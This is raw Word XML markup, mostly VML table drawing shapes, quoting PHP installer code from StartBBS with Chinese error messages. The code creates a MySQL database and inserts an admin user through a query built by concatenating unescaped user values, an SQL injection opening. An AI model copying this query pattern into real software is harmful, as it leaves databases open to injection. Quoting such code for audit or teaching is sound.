            <v:rect id="_x0000_s10328" style="position:absolute;left:1717;top:4048;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10327" style="position:absolute" from="1712,4048" to="1712,4374" strokeweight=".48pt"/>
            <v:line id="_x0000_s10326" style="position:absolute" from="8266,4048" to="8266,4374" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10325" style="position:absolute;left:1717;top:4374;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10324" style="position:absolute" from="1712,4374" to="1712,4700" strokeweight=".48pt"/>
            <v:line id="_x0000_s10323" style="position:absolute" from="8266,4374" to="8266,4700" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10322" style="position:absolute;left:1717;top:4700;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10321" style="position:absolute" from="1712,4700" to="1712,5026" strokeweight=".48pt"/>
            <v:line id="_x0000_s10320" style="position:absolute" from="8266,4700" to="8266,5026" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10319" style="position:absolute;left:1717;top:5026;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10318" style="position:absolute" from="1712,5026" to="1712,5352" strokeweight=".48pt"/>
            <v:line id="_x0000_s10317" style="position:absolute" from="8266,5026" to="8266,5352" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10316" style="position:absolute;left:1717;top:5352;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10315" style="position:absolute" from="1712,5352" to="1712,5678" strokeweight=".48pt"/>
            <v:line id="_x0000_s10314" style="position:absolute" from="8266,5352" to="8266,5678" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10313" style="position:absolute;left:1717;top:5678;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10312" style="position:absolute" from="1712,5678" to="1712,6004" strokeweight=".48pt"/>
            <v:line id="_x0000_s10311" style="position:absolute" from="8266,5678" to="8266,6004" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10310" style="position:absolute;left:1717;top:6004;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10309" style="position:absolute" from="1712,6004" to="1712,6330" strokeweight=".48pt"/>
            <v:line id="_x0000_s10308" style="position:absolute" from="8266,6004" to="8266,6330" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10307" style="position:absolute;left:1717;top:6330;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10306" style="position:absolute" from="1712,6330" to="1712,6656" strokeweight=".48pt"/>
            <v:line id="_x0000_s10305" style="position:absolute" from="8266,6330" to="8266,6656" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10304" style="position:absolute;left:1717;top:6656;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10303" style="position:absolute" from="1712,6656" to="1712,6982" strokeweight=".48pt"/>
            <v:line id="_x0000_s10302" style="position:absolute" from="8266,6656" to="8266,6982" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10301" style="position:absolute;left:1717;top:6982;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10300" style="position:absolute" from="1712,6982" to="1712,7308" strokeweight=".48pt"/>
            <v:line id="_x0000_s10299" style="position:absolute" from="8266,6982" to="8266,7308" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10298" style="position:absolute;left:1717;top:7308;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10297" style="position:absolute" from="1712,7308" to="1712,7634" strokeweight=".48pt"/>
            <v:line id="_x0000_s10296" style="position:absolute" from="8266,7308" to="8266,7634" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10295" style="position:absolute;left:1717;top:7634;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10294" style="position:absolute" from="1712,7634" to="1712,7960" strokeweight=".48pt"/>
            <v:line id="_x0000_s10293" style="position:absolute" from="8266,7634" to="8266,7960" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10292" style="position:absolute;left:1717;top:7960;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10291" style="position:absolute" from="1712,7960" to="1712,8286" strokeweight=".48pt"/>
            <v:line id="_x0000_s10290" style="position:absolute" from="8266,7960" to="8266,8286" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10289" style="position:absolute;left:1717;top:8286;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10288" style="position:absolute" from="1712,8286" to="1712,8612" strokeweight=".48pt"/>
            <v:line id="_x0000_s10287" style="position:absolute" from="8266,8286" to="8266,8612" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10286" style="position:absolute;left:1717;top:8612;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10285" style="position:absolute" from="1712,8612" to="1712,8938" strokeweight=".48pt"/>
            <v:line id="_x0000_s10284" style="position:absolute" from="8266,8612" to="8266,8938" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10283" style="position:absolute;left:1717;top:8938;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10282" style="position:absolute" from="1712,8938" to="1712,9264" strokeweight=".48pt"/>
            <v:line id="_x0000_s10281" style="position:absolute" from="8266,8938" to="8266,9264" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10280" style="position:absolute;left:1717;top:9264;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10279" style="position:absolute" from="1712,9264" to="1712,9590" strokeweight=".48pt"/>
            <v:line id="_x0000_s10278" style="position:absolute" from="8266,9264" to="8266,9590" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10277" style="position:absolute;left:1717;top:9590;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10276" style="position:absolute" from="1712,9590" to="1712,9916" strokeweight=".48pt"/>
            <v:line id="_x0000_s10275" style="position:absolute" from="8266,9590" to="8266,9916" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10274" style="position:absolute;left:1717;top:9916;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10273" style="position:absolute" from="1712,9916" to="1712,10242" strokeweight=".48pt"/>
            <v:line id="_x0000_s10272" style="position:absolute" from="8266,9916" to="8266,10242" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10271" style="position:absolute;left:1717;top:10242;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10270" style="position:absolute" from="1712,10242" to="1712,10568" strokeweight=".48pt"/>
            <v:line id="_x0000_s10269" style="position:absolute" from="8266,10242" to="8266,10568" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10268" style="position:absolute;left:1717;top:10568;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10267" style="position:absolute" from="1712,10568" to="1712,10894" strokeweight=".48pt"/>
            <v:line id="_x0000_s10266" style="position:absolute" from="8266,10568" to="8266,10894" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10265" style="position:absolute;left:1717;top:10894;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10264" style="position:absolute" from="1712,10894" to="1712,11220" strokeweight=".48pt"/>
            <v:line id="_x0000_s10263" style="position:absolute" from="8266,10894" to="8266,11220" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10262" style="position:absolute;left:1717;top:11220;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10261" style="position:absolute" from="1712,11220" to="1712,11546" strokeweight=".48pt"/>
            <v:line id="_x0000_s10260" style="position:absolute" from="8266,11220" to="8266,11546" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10259" style="position:absolute;left:1717;top:11546;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10258" style="position:absolute" from="1712,11546" to="1712,11872" strokeweight=".48pt"/>
            <v:line id="_x0000_s10257" style="position:absolute" from="8266,11546" to="8266,11872" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10256" style="position:absolute;left:1717;top:11872;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10255" style="position:absolute" from="1712,11872" to="1712,12198" strokeweight=".48pt"/>
            <v:line id="_x0000_s10254" style="position:absolute" from="8266,11872" to="8266,12198" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10253" style="position:absolute;left:1717;top:12198;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10252" style="position:absolute" from="1712,12198" to="1712,12524" strokeweight=".48pt"/>
            <v:line id="_x0000_s10251" style="position:absolute" from="8266,12198" to="8266,12524" strokeweight=".48pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="3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249" type="#_x0000_t202" style="width:327.7pt;height:554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80020F">
                  <w:pPr>
                    <w:spacing w:before="37"/>
                    <w:ind w:left="85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mysql_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connect(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$dbhost.':'.$dbport,$dbuser,$dbpwd);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="3747" w:right="-1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(!$conn) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48"/>
                    <w:ind w:right="250"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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die(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'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>无法连接到数据</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="85" w:right="2232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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>库服务器，请检查用户名和密码是否正确</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="1044"/>
                    <w:jc w:val="center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2833" w:right="-1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$this-&gt;input-&gt;post('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>creatdb')){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="3747" w:right="-1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!@mysql_query('CREATE</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="85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DATABASE IF NOT EXISTS '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dbname)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48" w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="85" w:right="-13" w:firstLine="914"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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w w:val="95"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>die('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>指定的数据库</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>('.$dbname.')</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>系统尝试创建失败，请通过其他方式</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:w w:val="95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建立数据库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');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="29"/>
                    <w:ind w:right="1784"/>
                    <w:jc w:val="righ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044"/>
                    <w:jc w:val="center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 w:line="285" w:lineRule="auto"/>
                    <w:ind w:left="3747" w:right="-13" w:hanging="915"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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!mysql_select_db($dbname,$conn)){ die($dbname.'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>数据库不存在，请创</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="85" w:right="2232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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>建或检查数据名</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>.');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="1044"/>
                    <w:jc w:val="center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ind w:left="1916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$sql</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-69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=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-69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file_get_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contents(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FCPATH.'app/config/startbbs.sq</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>l');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="1916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$sql = str_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replace(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"sb_",$dbprefix,$sql);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="1916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$explode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explode(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";",$sql);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="2833" w:right="334" w:hanging="917"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAns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 w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>data[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'msg1']="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>创建表</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>".$dbname."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>成功，请稍后</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>……</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> foreach ($explode as $key=&gt;$value){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="9" w:line="307" w:lineRule="auto"/>
                    <w:ind w:left="4107" w:right="984" w:hanging="26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!empty($value)){ if(trim($value)){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24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mysql_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query(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$value.";");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:right="867"/>
                    <w:jc w:val="righ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right="1784"/>
                    <w:jc w:val="righ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right="1784"/>
                    <w:jc w:val="righ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ind w:left="3747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$password = $pwd;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="3927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$ip=$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>myclass-&gt;get_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ip(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3" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="85" w:right="-13" w:firstLine="366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$insert= "INSERT INTO "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dbprefix."users (group_type,gid,is_active,username,password,email,regtime,ip) </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>VALUES   ('0','1','1','".$userid."','".$password."','".$email."','".time()."','".$ip."')";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="2833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mysql_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query(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$insert);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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s10146" style="position:absolute;margin-left:85.35pt;margin-top:71.75pt;width:328.2pt;height:554.7pt;z-index:-369688;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1707,1435" coordsize="6564,11094">
            <v:rect id="_x0000_s10248" style="position:absolute;left:1717;top:1440;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10247" style="position:absolute" from="1712,1440" to="1712,1766" strokeweight=".48pt"/>
            <v:line id="_x0000_s10246" style="position:absolute" from="8266,1440" to="8266,1766" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10245" style="position:absolute;left:1717;top:1766;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10244" style="position:absolute" from="1712,1766" to="1712,2092" strokeweight=".48pt"/>
            <v:line id="_x0000_s10243" style="position:absolute" from="8266,1766" to="8266,2092" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10242" style="position:absolute;left:1717;top:2092;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10241" style="position:absolute" from="1712,2092" to="1712,2418" strokeweight=".48pt"/>
            <v:line id="_x0000_s10240" style="position:absolute" from="8266,2092" to="8266,2418" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10239" style="position:absolute;left:1717;top:2418;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10238" style="position:absolute" from="1712,2418" to="1712,2744" strokeweight=".48pt"/>
            <v:line id="_x0000_s10237" style="position:absolute" from="8266,2418" to="8266,2744" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10236" style="position:absolute;left:1717;top:2744;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10235" style="position:absolute" from="1712,2744" to="1712,3070" strokeweight=".48pt"/>
            <v:line id="_x0000_s10234" style="position:absolute" from="8266,2744" to="8266,3070" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10233" style="position:absolute;left:1717;top:3070;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10232" style="position:absolute" from="1712,3070" to="1712,3396" strokeweight=".48pt"/>
            <v:line id="_x0000_s10231" style="position:absolute" from="8266,3070" to="8266,3396" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10230" style="position:absolute;left:1717;top:3396;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10229" style="position:absolute" from="1712,3396" to="1712,3722" strokeweight=".48pt"/>
            <v:line id="_x0000_s10228" style="position:absolute" from="8266,3396" to="8266,3722" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10227" style="position:absolute;left:1717;top:3722;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10226" style="position:absolute" from="1712,3722" to="1712,4048" strokeweight=".48pt"/>
            <v:line id="_x0000_s10225" style="position:absolute" from="8266,3722" to="8266,4048" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10224" style="position:absolute;left:1717;top:4048;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10223" style="position:absolute" from="1712,4048" to="1712,4374" strokeweight=".48pt"/>
            <v:line id="_x0000_s10222" style="position:absolute" from="8266,4048" to="8266,4374" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10221" style="position:absolute;left:1717;top:4374;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10220" style="position:absolute" from="1712,4374" to="1712,4700" strokeweight=".48pt"/>
            <v:line id="_x0000_s10219" style="position:absolute" from="8266,4374" to="8266,4700" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10218" style="position:absolute;left:1717;top:4700;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10217" style="position:absolute" from="1712,4700" to="1712,5026" strokeweight=".48pt"/>
            <v:line id="_x0000_s10216" style="position:absolute" from="8266,4700" to="8266,5026" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10215" style="position:absolute;left:1717;top:5026;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10214" style="position:absolute" from="1712,5026" to="1712,5352" strokeweight=".48pt"/>
            <v:line id="_x0000_s10213" style="position:absolute" from="8266,5026" to="8266,5352" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10212" style="position:absolute;left:1717;top:5352;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10211" style="position:absolute" from="1712,5352" to="1712,5678" strokeweight=".48pt"/>
            <v:line id="_x0000_s10210" style="position:absolute" from="8266,5352" to="8266,5678" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10209" style="position:absolute;left:1717;top:5678;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10208" style="position:absolute" from="1712,5678" to="1712,6004" strokeweight=".48pt"/>
            <v:line id="_x0000_s10207" style="position:absolute" from="8266,5678" to="8266,6004" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10206" style="position:absolute;left:1717;top:6004;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10205" style="position:absolute" from="1712,6004" to="1712,6330" strokeweight=".48pt"/>
            <v:line id="_x0000_s10204" style="position:absolute" from="8266,6004" to="8266,6330" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10203" style="position:absolute;left:1717;top:6330;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10202" style="position:absolute" from="1712,6330" to="1712,6656" strokeweight=".48pt"/>
            <v:line id="_x0000_s10201" style="position:absolute" from="8266,6330" to="8266,6656" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10200" style="position:absolute;left:1717;top:6656;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10199" style="position:absolute" from="1712,6656" to="1712,6982" strokeweight=".48pt"/>
            <v:line id="_x0000_s10198" style="position:absolute" from="8266,6656" to="8266,6982" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10197" style="position:absolute;left:1717;top:6982;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10196" style="position:absolute" from="1712,6982" to="1712,7308" strokeweight=".48pt"/>
            <v:line id="_x0000_s10195" style="position:absolute" from="8266,6982" to="8266,7308" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10194" style="position:absolute;left:1717;top:7308;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10193" style="position:absolute" from="1712,7308" to="1712,7634" strokeweight=".48pt"/>
            <v:line id="_x0000_s10192" style="position:absolute" from="8266,7308" to="8266,7634" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10191" style="position:absolute;left:1717;top:7634;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10190" style="position:absolute" from="1712,7634" to="1712,7960" strokeweight=".48pt"/>
            <v:line id="_x0000_s10189" style="position:absolute" from="8266,7634" to="8266,7960" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10188" style="position:absolute;left:1717;top:7960;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10187" style="position:absolute" from="1712,7960" to="1712,8286" strokeweight=".48pt"/>
            <v:line id="_x0000_s10186" style="position:absolute" from="8266,7960" to="8266,8286" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10185" style="position:absolute;left:1717;top:8286;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10184" style="position:absolute" from="1712,8286" to="1712,8612" strokeweight=".48pt"/>
            <v:line id="_x0000_s10183" style="position:absolute" from="8266,8286" to="8266,8612" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10182" style="position:absolute;left:1717;top:8612;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10181" style="position:absolute" from="1712,8612" to="1712,8938" strokeweight=".48pt"/>
            <v:line id="_x0000_s10180" style="position:absolute" from="8266,8612" to="8266,8938" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10179" style="position:absolute;left:1717;top:8938;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10178" style="position:absolute" from="1712,8938" to="1712,9264" strokeweight=".48pt"/>
            <v:line id="_x0000_s10177" style="position:absolute" from="8266,8938" to="8266,9264" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10176" style="position:absolute;left:1717;top:9264;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10175" style="position:absolute" from="1712,9264" to="1712,9590" strokeweight=".48pt"/>
            <v:line id="_x0000_s10174" style="position:absolute" from="8266,9264" to="8266,9590" strokeweight=".48pt"/>
            <v:rect id="_x0000_s10173" style="position:absolute;left:1717;top:9590;width:6545;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:line id="_x0000_s10172" style="position:absolute" from="1712,9590" to="1712,9916" strokeweight=".48pt"/>
            <v:line id="_x0000_s10171" style="position:absolute" from="8266,9590" to="8266,9916" strokeweight=".48pt"/>
